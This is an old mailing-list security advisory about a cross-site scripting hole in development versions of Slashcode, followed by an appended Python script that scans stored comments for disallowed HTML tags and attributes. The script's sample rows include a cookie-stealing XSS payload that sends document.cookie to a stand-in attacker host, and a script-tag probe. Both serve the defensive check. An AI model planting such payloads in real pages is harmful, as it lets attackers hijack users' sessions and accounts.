From: Jamie M. <ja...@mc...> - 2002-07-02 15:46:59
Slash in CVS had a cross-site scripting (XSS or CSS) vulnerability from June 20 to July 1 (yesterday). If you are running Slashcode from one of the tarball releases -- hopefully you are on 2.2.5 -- you are unaffected, don't worry about it. But if you are running Slashcode from CVS and you updated your site between June 20 and July 1, you will need to update to the latest version in CVS now. Please do so now.

An example exploit of this vulnerability has been posted to bugtraq (and Slashdot!), so you should assume that malicious users are already actively trying to attack sites. The example exploit did not include specific instructions on how to steal passwords, but this is trivial for anyone who understands XSS.

The impact of this vulnerability is that malicious readers can, at worst, steal your users' passwords, including those of your admins. Even if they do not steal passwords, they can cause other kinds of havoc by inserting unwelcome HTML, including scripting attacks, into comments and such.

After upgrading to the latest CVS, you should check the text fields of recent comments, journal entries, and submissions to make sure there are no scripting attacks. (Look for text like "<p " which indicates a tag that has attributes where none should be allowed. Other tags may be exploited.) If you cannot rule out the possibility of such attacks having been posted to your site, you will want to change your admins' passwords and otherwise take steps to ensure that their accounts are not compromised.

Sorry about all this, but these things can happen when you're working with pre-development-release CVS. Life in the fast lane. We'll try to make sure they don't happen again. Several of the Slash coders hang out in the #slash IRC channels on openprojects.net, and if you need help updating a CVS site to the latest version, we can help.

If you cannot upgrade to the latest version of CVS at this time, the simpler fix is to apply the "else" clause from this one patch. Note that, if your code from CVS is not already at the vulnerable version (Data.pm v1.31 to v1.38), it will look very different from what's shown here, and you will not know where to apply the patch, which is fine because that means you're not vulnerable :)

http://cvs.slashcode.com/index.cgi/slash/Slash/Utility/Data/Data.pm.diff?r1=1.38&r2=1.39

P.S. My bugtraq post said CVS between June 17 and July 1 was vulnerable; that's not correct, it's between June 20 and July 1. To be precise, Slash/Utility/Data/Data.pm versions 1.31 to 1.38. (At this moment, I'm still waiting for the bugtraq moderator to send that post through to that list.)

--
Jamie McCarthy ja...@sl...
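The post-upgrade check the message recommends (look for tags such as "<p " that carry attributes where none should be allowed) can be done mechanically over the stored comment, journal and submission text. The script below is an added example written for this page; it is not Jamie's code and not part of Slash. It assumes a particular set of approved tags with attributes permitted only on <a href>, which is an assumption to be replaced with your own site's configuration, and the sample comment rows are constructed here, not taken from any real site. It flags any tag that either is not in the approved set or carries an attribute it should not, which covers the "<p " case in the message and the "other tags" it warns about.

```python
import re

# ASSUMPTION (not from the advisory): the site's approved tag list, and which
# attributes are allowed on which tag. Adjust to match your Slash configuration.
ALLOWED_TAGS = {"b", "i", "p", "br", "a", "ol", "ul", "li", "dl", "dt", "dd",
                "em", "strong", "tt", "blockquote", "div", "ecode"}
ATTRS_ALLOWED = {"a": {"href"}}

# A tag is "<", optional "/", a name, then everything up to the next ">".
# Requiring a letter right after "<" keeps plain "x < y" from matching.
TAG_RE = re.compile(r"<(/?)([a-zA-Z][a-zA-Z0-9]*)([^>]*)>")
# Attribute names, skipping over quoted or bare values. Only group 1 is
# captured, so findall() returns just the names.
ATTR_RE = re.compile(
    r"""([a-zA-Z_:][-a-zA-Z0-9_:.]*)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+))?""")


def find_suspicious_tags(text):
    """Return [(tag_name, attribute_text), ...] for every opening tag that is
    either not approved at all or carries an attribute it is not allowed."""
    findings = []
    for m in TAG_RE.finditer(text):
        closing, name, rest = m.group(1), m.group(2).lower(), m.group(3).strip()
        if closing:
            continue                      # closing tags cannot carry attributes
        if name not in ALLOWED_TAGS:
            findings.append((name, rest))  # e.g. <script>, <iframe>
            continue
        attr_names = {a.lower() for a in ATTR_RE.findall(rest)}
        if attr_names - ATTRS_ALLOWED.get(name, set()):
            findings.append((name, rest))  # e.g. <p onmouseover=...>
    return findings


def scan_rows(rows):
    """rows: iterable of (row_id, text), as you would fetch from the comments,
    journals or submissions tables. Returns the ids that need a human look."""
    return [row_id for row_id, text in rows if find_suspicious_tags(text)]


# Constructed sample rows (not real site data), in the shape (id, text).
SAMPLE_COMMENTS = [
    (101, 'This is <b>fine</b> with a <a href="http://example.com/">link</a>.'),
    (102, '<p onmouseover="document.location=\'http://evil.example/?\'+document.cookie">hi</p>'),
    (103, "Plain text, no tags at all, and 2 < 3 is not a tag."),
    (104, "<script>alert(1)</script>"),
]

if __name__ == "__main__":
    for row_id, text in SAMPLE_COMMENTS:
        for tag, attrs in find_suspicious_tags(text):
            print(f"row {row_id}: <{tag}> with attributes {attrs!r}")
    print("rows to review:", scan_rows(SAMPLE_COMMENTS))
```

Run it against rows pulled from the database for the vulnerable window (June 20 to July 1); anything it reports should be inspected by hand, and if any hit is a real injected script, treat admin credentials as exposed, as the message says. The tag list is deliberately conservative: a false positive costs a glance, a false negative costs an admin account.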